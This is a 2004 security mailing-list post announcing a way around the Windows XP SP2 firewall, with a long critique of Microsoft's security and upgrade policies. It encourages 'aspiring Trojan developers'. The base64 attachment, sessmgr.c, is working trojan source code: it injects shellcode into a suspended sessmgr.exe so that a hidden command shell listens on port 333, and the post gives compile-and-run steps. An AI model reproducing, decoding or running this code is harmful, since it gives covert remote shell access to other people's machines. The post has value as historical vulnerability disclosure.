Date: Mon, 11 Oct 2004 22:10:38 -0700
From: americanidiot@hushmail.com
To: bugtraq@securityfocus.com
Subject: Writing Trojans that bypass Windows XP Service Pack 2 Firewall
Cc: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM, full-disclosure@lists.netsys.com
--Hush_boundary-416b674e88b82
Content-type: text/plain
Writing Trojans that bypass Windows XP Service Pack 2 Firewall
Windows XP Service Pack 2 incorporates many enhancements to try to better
protect systems from malware and other forms of attacks. One of those
layers of protection is the Windows XP SP2 Firewall. One of the features
of this firewall is the ability to allow users to decide what applications
can listen on the network. By allowing users to control what applications
can communicate on the network, Microsoft believes that systems will
be protected against threats such as trojans. Like so many things Microsoft
says, this is inaccurate and in fact it is very easy for locally executing
code to bypass the Windows firewall. So don't worry you aspiring Trojan
developers, your still going to be able to Trojan consumer and corporate
systems to your hearts content.
Attached to this email is proof of concept code that demonstrates how
a Trojan could bind to a port and accept connections by piggybacking
on the inherent trust of sessmgr.exe. Simply compile this program and
run it as any local user. To test if the firewall has been bypassed (it
is!) telnet from another machine to the target machine on port 333 and
if your connected, then you've successfuly bypassed the Windows XP Service
Pack 2 Firewall.
It is amazing to watch how the release of Windows XP Service Pack 2 has
affected the computing industry. It is as if people are yearning for
a cure so badly that they will happily drink the Kool-Aid and believe
Microsoft's mantra. If for no other reason than the hope of security.
In this belief though few are left standing to question the motivations
and misguided nature of Windows XP Service Pack 2 and security in general
from Microsoft.
The security enhancements of Service Pack 2 are not targeted at helping
corporations solve their Microsoft related security problems. Even in
the case of security for home users Microsoft has failed to provide any
real value. Instead they have provided confusion, and misguided trust.
One of the first security enhancements of Service Pack 2 is the fact
that Microsoft conducted a large scale source code audit to flush out
any outstanding bugs that might exist within the XP and 2003 codebase.
Through the use of source code analysis tools (PREfast and PREfix) and
outside consultants, Microsoft has hoped to fix the majority of buffer
overflows, and other commonly discovered vulnerabilities. This is probably
the only valid security effort on Microsoft's part for Service Pack 2.
Indeed many bugs have been identified and silently fixed within Service
Pack 2. In fact so many security bugs have been fixed by Microsoft's
source code audit that if you're running a Windows XP system without
SP2 then you're leaving yourself at great risk to being compromised.
It is easy to understand why some people would want to pat Microsoft
on the back for this effort. But for those of you who have invested millions
of dollars in Windows 2000, it is easy to understand why you might feel
that Microsoft has wronged you. In fact you might feel more than wronged
when Microsoft tells you that their answer for better security is to
buy their new operating system. You might feel like Microsoft is the
company selling you their sickness, and the next year, their cure.
You also have to understand that there is a lot of shared code between
Windows 2000 and Windows XP. What is the significance you ask? Microsoft
has found and fixed numerous vulnerabilities in Windows XP with the release
of Windows XP SP2. These vulnerabilities also exist within Windows 2000.
However, there is no current plan for Microsoft to release a Security
Service Pack for Windows 2000, nor do anything to fix the now known vulnerabilities
(hundreds of them) that exist in Windows 2000. Again you are left with
a choice, upgrade for a price, or be vulnerable. Is this not gross negligence
and extortion? This goes beyond any analogies of car tires exploding
and the liability of car manufacturers. It is a fact that right now Microsoft
knows of insecurities within the Windows 2000 operating system and they
have no plan to do anything about it. The United States government, Department
of Homeland Security, foreign governments, large financial institutions,
you are at the mercy of a company drunk on ego. You ask for security
but like Microsoft, it is not a real priority to you. If it was then
you would not let yourselves be so easily bullied by a software company
who is powerless against you, if you chose to take a stand and not only
demand better by your words, but by your actions.
Another security enhancement of Service Pack 2 is better protection around
executable code, to help prevent the propagation of virus and malware
programs. One of the ways that Microsoft has tried to help fight off
malware and virus programs is by adding an extra layer into the decision
making process of a user trying to run a virus or malware program. This
added layer uses code signing to attempt to verify trusted content. If
a program is not signed by a trusted source then a user is notified of
this and that user can allow or deny the program. This is another short
sighted feature on Microsoft's part as it does not add any real benefit
to corporations or home users. The way that this is going to work in
the real world is that now instead of a user running a program, or saying
yes to an ActiveX control, they are going to be prompted a second time
and told "This code has not been signed, are you sure you want to execute
it?" or in more realistic terms "Hello, this is your computer speaking.
Are you sure you want to perform the action that you already told me
you want to perform?" You can not expect a home user or your average
corporate user to understand what code signing is or to know if executable
content is coming from a trusted source or not. This is another exercise
on Microsoft's part in creating the illusion of safety, much like airport
guards carrying M-16 rifles. There is no real security value in this,
and if there was, then why not provide this "needed" security functionality
to older operating systems which Microsoft still "supports". Even in
the case of web browser security enhancements, such as the Internet Explorer
enhancements that Microsoft has added to XP SP2, Microsoft will not provide
those security enhancements for the Windows 2000 platform.... You can
always pay to upgrade your corporate user desktop licenses to this supposedly
more secure operating system. If Microsoft really believed these security
enhancements were beneficial and needed then why not provide them to
their users of other "supported" operating systems?
The single most misunderstood security enhancement of Windows XP Service
Pack 2 is the new and improved firewalling capabilities. It is amazing
to see people talking about the Windows XP SP2 firewall as if it actually
adds protection to corporations/organizations using Microsoft Windows.
In truth the Service Pack 2 firewall does more harm than good because
too many people have fallen under the mistaken idea that the firewall
is going to protect them from attack. This false belief will cause companies
to depend too much on a technology that cannot live up to their expectations.
This notion of the Service Pack 2 firewall protecting you from attack
is not something that IT people have dreamed up themselves, this is something
that Microsoft reinforces in all of their messaging about XP SP2. In
reality the XP SP2 firewall does nothing in the way of helping corporations
stay protected against the latest worm threat. The way in which this
firewall attempts to keep a system secure is by filtering/firewalling
the various protocols and ports which are potentially vulnerable to worms.
For example if you were to block ports: 135,137,139,445, etc... You would
have been "safe" against two of the biggest worms this year, Sasser and
Blaster. In this example the Windows XP Service Pack 2 firewall would
have protected your system against infection. The only problem is that
this scenario does not work "in the real world". The reason being that
these ports are the same ports that Microsoft Windows uses for File Sharing,
System and Domain management, and various other functionality that is
required by IT professionals to manage Windows based systems. So in an
effort to protect your organization you would in turn create a denial
of service and cripple your ability to manage your environment. Microsoft
does make recommendations to only allow things like File Sharing and
Windows Management available to other systems on your local subnet however
for a lot of organizations your domain controller, file servers, IT management
systems, are not going to exist on the same 255 host subnet. Therefore
you have to open these ports open to the rest of your network, which
means you are now back to square one and wide open to attack. Beyond
all of these usability and false sense of security problems the Windows
XP SP2 firewall is simply flawed as a program as illustrated in the beginning
of this email by the bypass attack.
When all the dust has settled around Windows XP SP2 people will see that
there has continued to be vulnerabilities discovered, systems compromised,
and worms released. The only difference is that you will have the appearance
of security because Microsoft will be able to show pretty graphs and
charts about how Windows XP SP2 and Windows 2003 have had less vulnerabilities
than other OS's like Windows 2000. This is also largely in part because
of monthly patching schedules and bundling of multiple vulnerabilities
within a single patch, all to show downward trends in vulnerabilities.
It is like they are trying to rub in the fact that they have so much
power over you that they can knowingly leave you vulnerable, force you
to pay them money to upgrade to security, and then tell the whole world
they made you do it, and if the rest of you don▓t, then your systems
are going to be compromised next. Compound that with the fact that the
systems they are forcing you to upgrade to are not that much more secure,
and ask yourselves how you have let such a monopoly gain so much control
over HOW YOU DO BUSINESS, HOW YOU MANAGE YOUR LIFE.
We can all do better, this is not how technology has to be.
--Hush_boundary-416b674e88b82
Content-type: application/octet-stream; name="sessmgr.c"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="sessmgr.c"
I2luY2x1ZGUgPHdpbmRvd3MuaD4NCiNpbmNsdWRlIDx3aW5zb2NrLmg+DQojaW5jbHVkZSA8c3Rk
bGliLmg+DQojaW5jbHVkZSA8c3RkaW8uaD4NCiNpbmNsdWRlIDx3aW5zb2NrLmg+DQoNCnZvaWQg
c2V0ZnAoY2hhciAqYnVmZmVyLGludCBzeixEV09SRCBmcm9tLERXT1JEIGZwKQ0Kew0KaW50IGk7
DQpmb3IoaT0wO2k8c3otNTtpKyspDQppZiAoYnVmZmVyW2ldPT0nXHhiOCcmJiooRFdPUkQqKShi
dWZmZXIraSsxKT09ZnJvbSkNCnsqKERXT1JEKikoYnVmZmVyK2krMSk9ZnA7YnJlYWs7fQ0KfQ0K
DQppbnQgaW5qY29kZShjaGFyICpidWZmZXIpDQp7DQpITU9EVUxFIHdzMl8zMjsNCkRXT1JEIF9s
b2FkbGlicmFyeWEsX2NyZWF0ZXByb2Nlc3NhLF93c2FzdGFydHVwLF93c2Fzb2NrZXRhLF9iaW5k
LF9saXN0ZW4sX2FjY2VwdCxfc2xlZXA7DQpjaGFyICpjb2RlOw0KaW50IGxlbjsNCndzMl8zMj1M
b2FkTGlicmFyeSgid3MyXzMyIik7DQpfbG9hZGxpYnJhcnlhPShEV09SRClHZXRQcm9jQWRkcmVz
cyhHZXRNb2R1bGVIYW5kbGUoImtlcm5lbDMyIiksIkxvYWRMaWJyYXJ5QSIpOw0KX2NyZWF0ZXBy
b2Nlc3NhPShEV09SRClHZXRQcm9jQWRkcmVzcyhHZXRNb2R1bGVIYW5kbGUoImtlcm5lbDMyIiks
IkNyZWF0ZVByb2Nlc3NBIik7DQpfc2xlZXA9KERXT1JEKUdldFByb2NBZGRyZXNzKEdldE1vZHVs
ZUhhbmRsZSgia2VybmVsMzIiKSwiU2xlZXAiKTsNCl93c2FzdGFydHVwPShEV09SRClHZXRQcm9j
QWRkcmVzcyh3czJfMzIsIldTQVN0YXJ0dXAiKTsNCl93c2Fzb2NrZXRhPShEV09SRClHZXRQcm9j
QWRkcmVzcyh3czJfMzIsIldTQVNvY2tldEEiKTsNCl9iaW5kPShEV09SRClHZXRQcm9jQWRkcmVz
cyh3czJfMzIsImJpbmQiKTsNCl9saXN0ZW49KERXT1JEKUdldFByb2NBZGRyZXNzKHdzMl8zMiwi
bGlzdGVuIik7DQpfYWNjZXB0PShEV09SRClHZXRQcm9jQWRkcmVzcyh3czJfMzIsImFjY2VwdCIp
Ow0KDQpfX2FzbQ0Kew0KY2FsbCBvdmVyDQoNCnB1c2ggJzIzJw0KcHVzaCAnXzJzdycNCnB1c2gg
ZXNwDQptb3YgZWF4LDB4MTExMTExMTENCmNhbGwgZWF4DQoNCnhvciBlYngsZWJ4DQpwdXNoIDB4
NjQNCnBvcCBlY3gNCndzYWRhdGE6DQpwdXNoIGVieA0KbG9vcCB3c2FkYXRhDQpwdXNoIGVzcA0K
cHVzaCAweDEwMQ0KbW92IGVheCwweDMzMzMzMzMzDQpjYWxsIGVheA0KDQpwdXNoIGVieA0KcHVz
aCBlYngNCnB1c2ggZWJ4DQpwdXNoIGVieA0KcHVzaCBTT0NLX1NUUkVBTQ0KcHVzaCBBRl9JTkVU
DQptb3YgZWF4LDB4NDQ0NDQ0NDQNCmNhbGwgZWF4DQptb3YgZXNpLGVheA0KDQpwdXNoIGVieA0K
cHVzaCBlYngNCnB1c2ggZWJ4DQpwdXNoIDB4NEQwMTAwMDIgLypwb3J0IDMzMyovDQptb3YgZWF4
LGVzcA0KcHVzaCAweDEwDQpwdXNoIGVheA0KcHVzaCBlc2kNCm1vdiBlYXgsMHg1NTU1NTU1NQ0K
Y2FsbCBlYXgNCg0KcHVzaCBTT01BWENPTk4NCnB1c2ggZXNpDQptb3YgZWF4LDB4NjY2NjY2NjYN
CmNhbGwgZWF4DQoNCnB1c2ggZWJ4DQpwdXNoIGVieA0KcHVzaCBlc2kNCm1vdiBlYXgsMHg3Nzc3
Nzc3Nw0KY2FsbCBlYXgNCm1vdiBlZGksZWF4DQoNCnB1c2ggZWJ4DQpwdXNoIGVieA0KcHVzaCBl
YngNCnB1c2ggZWJ4DQptb3YgZWF4LGVzcA0KcHVzaCBlZGkNCnB1c2ggZWRpDQpwdXNoIGVkaQ0K
cHVzaCBlYngNCnB1c2ggU1dfSElERQ0KcHVzaCBTVEFSVEZfVVNFU1RESEFORExFUw0KcHVzaCAw
eEENCnBvcCBlY3gNCnN0YXJ0dXBpbmZvOg0KcHVzaCBlYngNCmxvb3Agc3RhcnR1cGluZm8NCnB1
c2ggMHg0NA0KbW92IGVjeCxlc3ANCnB1c2ggJ2RtYycNCm1vdiBlZHgsIGVzcA0KDQpwdXNoIGVh
eA0KcHVzaCBlY3gNCnB1c2ggZWJ4DQpwdXNoIGVieA0KcHVzaCBlYngNCnB1c2ggMQ0KcHVzaCBl
YngNCnB1c2ggZWJ4DQpwdXNoIGVkeA0KcHVzaCBlYngNCm1vdiBlYXgsMHgyMjIyMjIyMg0KY2Fs
bCBlYXgNCg0KcHVzaCBJTkZJTklURQ0KbW92IGVheCwweDg4ODg4ODg4DQpjYWxsIGVheA0KDQpv
dmVyOg0KcG9wIGVheA0KbW92IGNvZGUsZWF4DQp9DQoNCmxlbj0weEEwOw0KbWVtY3B5KGJ1ZmZl
cixjb2RlLGxlbik7DQpzZXRmcChidWZmZXIsbGVuLDB4MTExMTExMTEsX2xvYWRsaWJyYXJ5YSk7
DQpzZXRmcChidWZmZXIsbGVuLDB4MjIyMjIyMjIsX2NyZWF0ZXByb2Nlc3NhKTsNCnNldGZwKGJ1
ZmZlcixsZW4sMHgzMzMzMzMzMyxfd3Nhc3RhcnR1cCk7DQpzZXRmcChidWZmZXIsbGVuLDB4NDQ0
NDQ0NDQsX3dzYXNvY2tldGEpOw0Kc2V0ZnAoYnVmZmVyLGxlbiwweDU1NTU1NTU1LF9iaW5kKTsN
CnNldGZwKGJ1ZmZlcixsZW4sMHg2NjY2NjY2NixfbGlzdGVuKTsNCnNldGZwKGJ1ZmZlcixsZW4s
MHg3Nzc3Nzc3NyxfYWNjZXB0KTsNCnNldGZwKGJ1ZmZlcixsZW4sMHg4ODg4ODg4OCxfc2xlZXAp
Ow0KDQpyZXR1cm4gbGVuOw0KfQ0KDQp2b2lkIG1haW4odm9pZCkNCnsNClNUQVJUVVBJTkZPIHNp
bmZvOw0KUFJPQ0VTU19JTkZPUk1BVElPTiBwaW5mbzsNCkNPTlRFWFQgY29udGV4dDsNCkxEVF9F
TlRSWSBzZWw7DQpEV09SRCByZWFkLHRpYixwZWIsZXhlYmFzZSxwZW9mZnMsZXA7DQpJTUFHRV9O
VF9IRUFERVJTIHBlaGRyOw0KaW50IGxlbjsNCmNoYXIgc2Vzc21ncltNQVhfUEFUSCsxM107DQpj
aGFyIGJ1ZmZlclsyMDQ4XTsNCg0KR2V0U3lzdGVtRGlyZWN0b3J5KHNlc3NtZ3IsTUFYX1BBVEgp
Ow0Kc2Vzc21ncltNQVhfUEFUSF09MDsNCnN0cmNhdChzZXNzbWdyLCJcXHNlc3NtZ3IuZXhlIik7
DQptZW1zZXQoJnNpbmZvLDAsc2l6ZW9mKHNpbmZvKSk7DQpzaW5mby5jYj1zaXplb2Yoc2luZm8p
Ow0KDQppZiAoIUNyZWF0ZVByb2Nlc3Moc2Vzc21ncixOVUxMLE5VTEwsTlVMTCxGQUxTRSxDUkVB
VEVfU1VTUEVOREVELE5VTEwsTlVMTCwmc2luZm8sJnBpbmZvKSkNCnByaW50ZigiY3JlYXRlcHJv
Y2VzcyBmYWlsZWQiKSwgZXhpdCgxKTsNCg0KY29udGV4dC5Db250ZXh0RmxhZ3M9Q09OVEVYVF9G
VUxMOw0KR2V0VGhyZWFkQ29udGV4dChwaW5mby5oVGhyZWFkLCZjb250ZXh0KTsNCkdldFRocmVh
ZFNlbGVjdG9yRW50cnkocGluZm8uaFRocmVhZCxjb250ZXh0LlNlZ0ZzLCZzZWwpOw0KdGliPXNl
bC5CYXNlTG93fChzZWwuSGlnaFdvcmQuQnl0ZXMuQmFzZU1pZDw8MTYpfChzZWwuSGlnaFdvcmQu
Qnl0ZXMuQmFzZUhpPDwyNCk7DQpSZWFkUHJvY2Vzc01lbW9yeShwaW5mby5oUHJvY2VzcywoTFBD
Vk9JRCkodGliKzB4MzApLCZwZWIsNCwmcmVhZCk7DQpSZWFkUHJvY2Vzc01lbW9yeShwaW5mby5o
UHJvY2VzcywoTFBDVk9JRCkocGViKzB4MDgpLCZleGViYXNlLDQsJnJlYWQpOw0KDQpSZWFkUHJv
Y2Vzc01lbW9yeShwaW5mby5oUHJvY2VzcywoTFBDVk9JRCkoZXhlYmFzZSsweDNDKSwmcGVvZmZz
LDQsJnJlYWQpOw0KUmVhZFByb2Nlc3NNZW1vcnkocGluZm8uaFByb2Nlc3MsKExQQ1ZPSUQpKGV4
ZWJhc2UrcGVvZmZzKSwmcGVoZHIsc2l6ZW9mKHBlaGRyKSwmcmVhZCk7DQplcD1leGViYXNlK3Bl
aGRyLk9wdGlvbmFsSGVhZGVyLkFkZHJlc3NPZkVudHJ5UG9pbnQ7DQoNCmxlbj1pbmpjb2RlKGJ1
ZmZlcik7DQpWaXJ0dWFsUHJvdGVjdCgoTFBWT0lEKWVwLGxlbixQQUdFX0VYRUNVVEVfUkVBRFdS
SVRFLCZyZWFkKTsNCldyaXRlUHJvY2Vzc01lbW9yeShwaW5mby5oUHJvY2VzcywoTFBWT0lEKWVw
LGJ1ZmZlcixsZW4sJnJlYWQpOw0KDQpSZXN1bWVUaHJlYWQocGluZm8uaFRocmVhZCk7DQp9DQo=
--Hush_boundary-416b674e88b82--
Concerned about your privacy? Follow this link to get
secure FREE email: http://www.hushmail.com/?l=2
Free, ultra-private instant messaging with Hush Messenger
http://www.hushmail.com/services-messenger?l=434
Promote security and make money with the Hushmail Affiliate Program:
http://www.hushmail.com/about-affiliate?l=427
